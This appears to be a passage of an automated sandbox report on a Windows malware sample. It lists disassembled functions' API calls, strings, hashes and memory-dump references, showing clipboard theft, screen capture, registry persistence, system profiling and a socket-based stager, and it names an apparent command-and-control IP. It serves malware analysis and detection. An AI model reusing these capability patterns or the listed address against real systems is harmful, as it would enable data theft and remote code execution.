                                          • _memset.LIBCMT ref: 03D879FE
                                          • wsprintfW.USER32 ref: 03D87A66
                                          • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 03D87A8F
                                          • _memset.LIBCMT ref: 03D87AA6
                                            • Part of subcall function 03D87780: _memset.LIBCMT ref: 03D877AC
                                            • Part of subcall function 03D87780: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03D877B8
                                          Strings
                                          • CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}, xrefs: 03D87A60
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                          • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}
                                          • API String ID: 1221949200-4035668053
                                          • Opcode ID: d01d21ac7effa6a696e21b177863310f9e9a3494b7d87d5cc20947eba28afca8
                                          • Instruction ID: 35812a3a4c0d2a4797478a28f6f0f9dd1c07a5110df7e2fa37e4ba144b6051d5
                                          • Opcode Fuzzy Hash: d01d21ac7effa6a696e21b177863310f9e9a3494b7d87d5cc20947eba28afca8
                                          • Instruction Fuzzy Hash: 8181D8F2A10229EFD721DBA5CC41FEEB7B9EB88700F1441C9F619A7241D674AA44CF64

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2010 6c35b1de-6c35b228 call 6c370908 call 6c3d1f84 * 2 2018 6c35b247-6c35b253 call 6c3d330e 2010->2018 2019 6c35b22a-6c35b22d 2010->2019 2027 6c35b255-6c35b258 2018->2027 2028 6c35b278-6c35b285 call 6c3d330e 2018->2028 2020 6c35b242-6c35b245 2019->2020 2021 6c35b22f-6c35b234 2019->2021 2020->2018 2024 6c35b238-6c35b23f 2020->2024 2021->2019 2023 6c35b236 2021->2023 2023->2020 2024->2018 2026 6c35b241 2024->2026 2026->2020 2027->2028 2030 6c35b25a-6c35b275 call 6c370908 call 6c3d1f84 2027->2030 2033 6c35b287-6c35b28a 2028->2033 2034 6c35b2aa-6c35b2b3 call 6c3d330e 2028->2034 2030->2028 2033->2034 2036 6c35b28c-6c35b2a7 call 6c370908 call 6c3d1f84 2033->2036 2043 6c35b2b5-6c35b2b8 2034->2043 2044 6c35b2d8-6c35b300 call 6c370908 call 6c3d1f84 call 6c396956 2034->2044 2036->2034 2043->2044 2047 6c35b2ba-6c35b2d5 call 6c370908 call 6c3d1f84 2043->2047 2057 6c35b305-6c35b31d call 6c3d1f75 2044->2057 2047->2044
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$__wgetenv$__output_l
                                          • String ID: %s%s$7.10$ASTR$ASTROLOG$C:\Astrolog
                                          • API String ID: 2520948663-3225433610
                                          • Opcode ID: a4add5877c75b6eb68cea135925fa746c337cfc7d02e47becf29a49cc7d62997
                                          • Instruction ID: 115753645959fad13315a117151925cd48c7bece72980ab9ad048b6c05c0983d
                                          • Opcode Fuzzy Hash: a4add5877c75b6eb68cea135925fa746c337cfc7d02e47becf29a49cc7d62997
                                          • Instruction Fuzzy Hash: 5531C7B28005889AEB40D6A4DC44FFE776C9F4231CF6404A198C1DFE51EB269598CF72
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000002,?,90594F2A,?,00000000,?), ref: 03D96D6E
                                          • GlobalLock.KERNEL32(00000000), ref: 03D96D77
                                          • _memmove.LIBCMT ref: 03D96D83
                                          • GlobalUnlock.KERNEL32(00000000), ref: 03D96D8C
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 03D96DA2
                                          • EnterCriticalSection.KERNEL32(03DC1EA4), ref: 03D96DE0
                                          • LeaveCriticalSection.KERNEL32(03DC1EA4), ref: 03D96DF1
                                            • Part of subcall function 03D94AA0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03D94AC4
                                            • Part of subcall function 03D94AA0: GdipDisposeImage.GDIPLUS(?), ref: 03D94AD8
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 03D96E19
                                            • Part of subcall function 03D95120: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 03D9514D
                                            • Part of subcall function 03D95120: _free.LIBCMT ref: 03D951C3
                                          • GetHGlobalFromStream.OLE32(?,?), ref: 03D96E3A
                                          • GlobalLock.KERNEL32(?), ref: 03D96E44
                                          • GlobalFree.KERNEL32(00000000), ref: 03D96E5D
                                            • Part of subcall function 03D94860: DeleteObject.GDI32(?), ref: 03D94892
                                            • Part of subcall function 03D94860: EnterCriticalSection.KERNEL32(03DC1EA4,?,?,?,03D9483B), ref: 03D948A3
                                            • Part of subcall function 03D94860: EnterCriticalSection.KERNEL32(03DC1EA4,?,?,?,03D9483B), ref: 03D948B8
                                            • Part of subcall function 03D94860: GdiplusShutdown.GDIPLUS(00000000,?,?,?,03D9483B), ref: 03D948C4
                                            • Part of subcall function 03D94860: LeaveCriticalSection.KERNEL32(03DC1EA4,?,?,?,03D9483B), ref: 03D948D5
                                            • Part of subcall function 03D94860: LeaveCriticalSection.KERNEL32(03DC1EA4,?,?,?,03D9483B), ref: 03D948DC
                                          • GlobalSize.KERNEL32(00000000), ref: 03D96E72
                                          • _memmove.LIBCMT ref: 03D96E8F
                                          • GlobalUnlock.KERNEL32(?), ref: 03D96EE6
                                          • GlobalFree.KERNEL32(00000000), ref: 03D96F0B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock_memmove$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                          • String ID:
                                          • API String ID: 2505451885-0
                                          • Opcode ID: 78a34c0a9751c1a578d328ffeaa159941fed24793f982a8cc5c245d9132f246b
                                          • Instruction ID: f97a70ef53b6cb2ae50c8549f418dc2b718879e089676951e95591fb3d13b1d8
                                          • Opcode Fuzzy Hash: 78a34c0a9751c1a578d328ffeaa159941fed24793f982a8cc5c245d9132f246b
                                          • Instruction Fuzzy Hash: 336139B6D10218EFDB10EFA5E884A9EBBB9FF48710F10451AF515A7305DB709905CFA0
                                          APIs
                                          • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,03D85DC8,0000035E,000002FA), ref: 03D8899C
                                          • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 03D889B2
                                          • swprintf.LIBCMT ref: 03D889EF
                                            • Part of subcall function 03D88910: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03D88A23), ref: 03D8893D
                                            • Part of subcall function 03D88910: GetProcAddress.KERNEL32(00000000), ref: 03D88944
                                            • Part of subcall function 03D88910: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03D88A23), ref: 03D88952
                                          • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 03D88A47
                                          • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 03D88A63
                                          • RegCloseKey.KERNEL32(000002FA), ref: 03D88A86
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,03D85DC8,0000035E,000002FA), ref: 03D88A98
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                          • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                          • API String ID: 2158625971-3190923360
                                          • Opcode ID: d013b5b9d48e687c96c9be5f09c7f759264538e2aed067854f8dfd135c1cda6a
                                          • Instruction ID: 7d43008f0f347a830a8991f7b28976a1e611b34a1b3ae4ed4012aada99606b4d
                                          • Opcode Fuzzy Hash: d013b5b9d48e687c96c9be5f09c7f759264538e2aed067854f8dfd135c1cda6a
                                          • Instruction Fuzzy Hash: 0C31A476640308FFEB14EBA4CC45FFF777CEB48741F044519BA1AA6285E674DA048760
                                          APIs
                                            • Part of subcall function 02F07684: __fassign.LIBCMT ref: 02F0767A
                                          • Sleep.KERNEL32(00000000), ref: 02F0614C
                                          • RegOpenKeyExW.KERNEL32(80000001,end,00000000,00020019,?), ref: 02F06168
                                          • RegCloseKey.ADVAPI32(?), ref: 02F06176
                                          • ExitProcess.KERNEL32 ref: 02F0617D
                                          • Sleep.KERNEL32(00000000), ref: 02F062E0
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02F0632C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Sleep$CloseCreateEventExitOpenProcess__fassign
                                          • String ID: 45.201.245.153$end
                                          • API String ID: 64032600-4096021252
                                          • Opcode ID: 7b5a447d34762953caef9f750ab0437ee1b518a47c63e3f91f5eba24dea19317
                                          • Instruction ID: 7e146aa4f1d076b02e0e6f4be51e8f26001373f54840c983d8b22a8f07fd907a
                                          • Opcode Fuzzy Hash: 7b5a447d34762953caef9f750ab0437ee1b518a47c63e3f91f5eba24dea19317
                                          • Instruction Fuzzy Hash: 7661D471E8020AAFEB10EFA4CCC5E6DFB75AF48B94F910519E206A72C1CB709911DF91
                                          APIs
                                          • _memset.LIBCMT ref: 03D879FE
                                          • wsprintfW.USER32 ref: 03D87A66
                                          • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 03D87A8F
                                          • _memset.LIBCMT ref: 03D87AA6
                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 03D87AE2
                                          • lstrcatW.KERNEL32(03DC4360,?), ref: 03D87AFE
                                          • lstrcatW.KERNEL32(03DC4360,03DB5FCC), ref: 03D87B0A
                                          • RegCloseKey.ADVAPI32(00000000), ref: 03D87B13
                                          • lstrlenW.KERNEL32(03DC4360,?,90594F2A,00000000,00000AD4,75BF73E0), ref: 03D87B57
                                          • lstrcatW.KERNEL32(03DC4360,03DB6044,?,90594F2A,00000000,00000AD4,75BF73E0), ref: 03D87B6B
                                          Strings
                                          • CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}, xrefs: 03D87A60
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                          • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}
                                          • API String ID: 1671694837-4035668053
                                          • Opcode ID: 9c3d0003eeb90d4f0dc67955894e223220520a9eaf5b286744b9ce9f9de9db00
                                          • Instruction ID: cda586852243917faa81b164282dc1c6c8377f874a9b244664dc2d94c3ac12db
                                          • Opcode Fuzzy Hash: 9c3d0003eeb90d4f0dc67955894e223220520a9eaf5b286744b9ce9f9de9db00
                                          • Instruction Fuzzy Hash: 6241C8F1900268AFDB21DB95CC55FEEB3B8AF88704F0441C8F349A7181D674AA84CF64
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf
                                          • String ID: ,M31$,beCru$,ze-1Ret$@$Alnilam$Kaus Australis$Pleione$Rigil Kentaurus
                                          • API String ID: 1467051239-1042911856
                                          • Opcode ID: 1a2c5cd3aee1c56dad5d204c0a3117bf54ca61b5241e0f064adcda4e5d00204a
                                          • Instruction ID: 41f671232679176d1ee5a9d04847eec4123789933b60c22220a969ea9e84fc57
                                          • Opcode Fuzzy Hash: 1a2c5cd3aee1c56dad5d204c0a3117bf54ca61b5241e0f064adcda4e5d00204a
                                          • Instruction Fuzzy Hash: FE812031A0855ADACF10EF25D884DE87BB4FB4B30DF9245E9D0C95A854DB3282A8CF21
                                          APIs
                                            • Part of subcall function 03D858B0: InterlockedDecrement.KERNEL32(?), ref: 03D858FF
                                            • Part of subcall function 03D858B0: SysFreeString.OLEAUT32(00000000), ref: 03D85914
                                            • Part of subcall function 03D858B0: SysAllocString.OLEAUT32(03DB5B0C), ref: 03D85965
                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03DB5B0C,?,03DB5B0C,00000000,00000000), ref: 03D87D24
                                          • GetLastError.KERNEL32 ref: 03D87D2E
                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 03D87D46
                                          • HeapAlloc.KERNEL32(00000000), ref: 03D87D4D
                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 03D87D6F
                                          • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 03D87DA1
                                          • GetLastError.KERNEL32 ref: 03D87DAB
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 03D87E16
                                          • HeapFree.KERNEL32(00000000), ref: 03D87E1D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                          • String ID: NONE_MAPPED
                                          • API String ID: 1317816589-2950899194
                                          • Opcode ID: dfc76483d29be59806f388c6a098782ed3f5298ddc3b2666bf7211b79326c572
                                          • Instruction ID: 49db68ee5d534a868136b5c5a96a8f471eefd2f4eefaa1108cebf0fad0bd4302
                                          • Opcode Fuzzy Hash: dfc76483d29be59806f388c6a098782ed3f5298ddc3b2666bf7211b79326c572
                                          • Instruction Fuzzy Hash: C74156B7500209DBDB21EB60DD44FAEB77DEF84B00F144599F709A7240EA709E858F65
                                          APIs
                                          • _memset.LIBCMT ref: 03D868CD
                                          • lstrlenW.KERNEL32(?,74DEE010,74DF2FA0,74DF0F00), ref: 03D868DD
                                            • Part of subcall function 03D88270: _memset.LIBCMT ref: 03D882D9
                                            • Part of subcall function 03D88270: RegOpenKeyExW.KERNEL32(80000001,03DB5BF8,00000000,00020019,75BF73E0), ref: 03D882FC
                                          • lstrcmpW.KERNEL32(?,03DB5F60), ref: 03D86912
                                          • RegOpenKeyExW.ADVAPI32 ref: 03D86941
                                          • RegQueryValueExW.ADVAPI32(?,Regex,00000000,?,00000000,?), ref: 03D8696B
                                          • _memset.LIBCMT ref: 03D86987
                                          • RegQueryValueExW.ADVAPI32(?,Regex,00000000,?,00000000,?,?,?,?,?), ref: 03D869A5
                                          • std::locale::_Init.LIBCPMT ref: 03D86A64
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 03D86A7C
                                            • Part of subcall function 03D8B290: std::_Lockit::_Lockit.LIBCPMT ref: 03D8B3DD
                                          • _memmove.LIBCMT ref: 03D86E87
                                          • _memmove.LIBCMT ref: 03D86F12
                                          • _memmove.LIBCMT ref: 03D86FFF
                                          • _memmove.LIBCMT ref: 03D870A3
                                          • GetDesktopWindow.USER32 ref: 03D87126
                                          • OpenClipboard.USER32(00000000), ref: 03D8712D
                                          • GetClipboardData.USER32(00000001), ref: 03D87135
                                          • GlobalSize.KERNEL32(00000000), ref: 03D87146
                                          • GlobalLock.KERNEL32(00000000), ref: 03D87152
                                          • GlobalUnlock.KERNEL32(?), ref: 03D87199
                                          • CloseClipboard.USER32 ref: 03D8719F
                                          • Sleep.KERNEL32(000003E8), ref: 03D8770D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _memmove$ClipboardGlobalOpen_memset$LockitLockit::_QueryValuestd::_$CloseDataDesktopInitLockSizeSleepUnlockWindowlstrcmplstrlenstd::locale::_
                                          • String ID: 2024. 9.12$Regex$Uopen$key$open
                                          • API String ID: 90521431-542576200
                                          • Opcode ID: dc87ab613baf99fd6e6a69a835e47c06968a1c10f993a68ea1b151c9fdb861db
                                          • Instruction ID: 019f6d0539b8dc372f11f355b6a7b5a48de5ef3076b699665eb192e4085a040f
                                          • Opcode Fuzzy Hash: dc87ab613baf99fd6e6a69a835e47c06968a1c10f993a68ea1b151c9fdb861db
                                          • Instruction Fuzzy Hash: BC3196B2504344EFD210EB64EC85FABB3EDEB89754F004A1DF54587240EB74E904CBA2
                                          APIs
                                          • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 03D9514D
                                          • _malloc.LIBCMT ref: 03D95191
                                          • _free.LIBCMT ref: 03D951C3
                                          • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 03D951E2
                                          • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 03D95254
                                          • GdipDisposeImage.GDIPLUS(00000000), ref: 03D9525F
                                          • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 03D95285
                                          • GdipDisposeImage.GDIPLUS(00000000), ref: 03D9529D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                          • String ID: &
                                          • API String ID: 2794124522-3042966939
                                          • Opcode ID: a51202fe41924b040e2db21958694ae76522644ffe27d29b4eefc631155b0f79
                                          • Instruction ID: 39171db36c7ad961b7548e126143d5f306ac85b04147836c8fea9fe9053750de
                                          • Opcode Fuzzy Hash: a51202fe41924b040e2db21958694ae76522644ffe27d29b4eefc631155b0f79
                                          • Instruction Fuzzy Hash: BA515276D00219AFEF05DFA4D8449EEB7B9EF49710F04452AE905BB350E734A905CBB0
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02F05372
                                          • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02F05382
                                          • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,02F1C6E0,000012A0), ref: 02F053A0
                                          • RegCloseKey.KERNEL32(?), ref: 02F053AB
                                          • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02F053FF
                                          • GetExitCodeProcess.KERNEL32(00000000,?), ref: 02F0540B
                                          • Sleep.KERNEL32(00000BB8), ref: 02F05424
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                          • String ID: IpDates_info$SOFTWARE
                                          • API String ID: 864241144-2243437601
                                          • Opcode ID: c267284f795d32e8543a6c5636ebc6bed8fab1d438b8120cefa7750ee57035f4
                                          • Instruction ID: f9d3751d8de3719e67f04703722c739c8e831dfba7d5abdf30a062ec8ecaafe3
                                          • Opcode Fuzzy Hash: c267284f795d32e8543a6c5636ebc6bed8fab1d438b8120cefa7750ee57035f4
                                          • Instruction Fuzzy Hash: 10412A32A842459FD3109B309C89B7ABBA6BB447C4FD90448E789D61C2D3F0D401DF62
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02F05372
                                          • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02F05382
                                          • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,02F1C6E0,000012A0), ref: 02F053A0
                                          • RegCloseKey.KERNEL32(?), ref: 02F053AB
                                          • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02F053FF
                                          • GetExitCodeProcess.KERNEL32(00000000,?), ref: 02F0540B
                                          • Sleep.KERNEL32(00000BB8), ref: 02F05424
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                          • String ID: IpDates_info$SOFTWARE
                                          • API String ID: 864241144-2243437601
                                          • Opcode ID: 8ba160c13f798ac5b1aefc714b07c42d159bb153c95aaca8b3bd6a146fa81435
                                          • Instruction ID: 50cd578ddc131f81439ef9a883225123971c0af0de4ec8543f49bf66151df5b0
                                          • Opcode Fuzzy Hash: 8ba160c13f798ac5b1aefc714b07c42d159bb153c95aaca8b3bd6a146fa81435
                                          • Instruction Fuzzy Hash: E931A530A883459FD721DB708899B79BBE6BB447C4FD90848E3899A2C2C3F0D505DB61
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,03DB0F38,90594F2A,00000001,00000000,00000000), ref: 03D97781
                                          • RegQueryInfoKeyW.ADVAPI32(03DB0F38,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 03D977B0
                                          • _memset.LIBCMT ref: 03D97814
                                          • _memset.LIBCMT ref: 03D97823
                                          • RegEnumValueW.KERNEL32(03DB0F38,?,00000000,?,00000000,?,00000000,?), ref: 03D97842
                                            • Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC
                                            • Part of subcall function 03D9ABD2: std::exception::exception.LIBCMT ref: 03D9AC21
                                            • Part of subcall function 03D9ABD2: std::exception::exception.LIBCMT ref: 03D9AC3B
                                            • Part of subcall function 03D9ABD2: __CxxThrowException@8.LIBCMT ref: 03D9AC4C
                                          • _memmove.LIBCMT ref: 03D978C5
                                          • RegCloseKey.KERNEL32(03DB0F38,?,?,?,?,?,?,?,?,?,?,?,00000000,03DB0F38,000000FF), ref: 03D97953
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc_memmove
                                          • String ID: Console\0
                                          • API String ID: 1346252173-1253790388
                                          • Opcode ID: 025d8a8c21041c1ff3b9caa4b069fdddca588da998496ba9a2f2b648d3969edc
                                          • Instruction ID: 8f6dbd73538d04f5cd0f9ac3ffc170adc5fb91d12429fd86c58a32fb215b240f
                                          • Opcode Fuzzy Hash: 025d8a8c21041c1ff3b9caa4b069fdddca588da998496ba9a2f2b648d3969edc
                                          • Instruction Fuzzy Hash: 45611CB6E00219EFDB04DFA8D880AEEB7B9FF49310F14466AE915A7345D7349901CBA0
                                          APIs
                                          • socket.WS2_32(00000002,00000001,00000006,00000000,00000000,?,?,02EB08C6,00000001), ref: 02EB0908
                                          • VirtualAlloc.KERNEL32(00000000,0008000E,00003000,00000040,?,?,02EB08C6,00000001), ref: 02EB0924
                                          • connect.WS2_32(?,?,00000010), ref: 02EB0981
                                          • send.WS2_32(?,00000001,00000004,00000000), ref: 02EB099F
                                          • VirtualAlloc.KERNEL32(00000000,0004D800,00003000,00000004), ref: 02EB09B9
                                          • recv.WS2_32(?,00000001,00019000,00000000), ref: 02EB09D4
                                          • VirtualFree.KERNELBASE(00000001,00000000,00008000), ref: 02EB09FF
                                          Strings
                                          Memory Dump Source
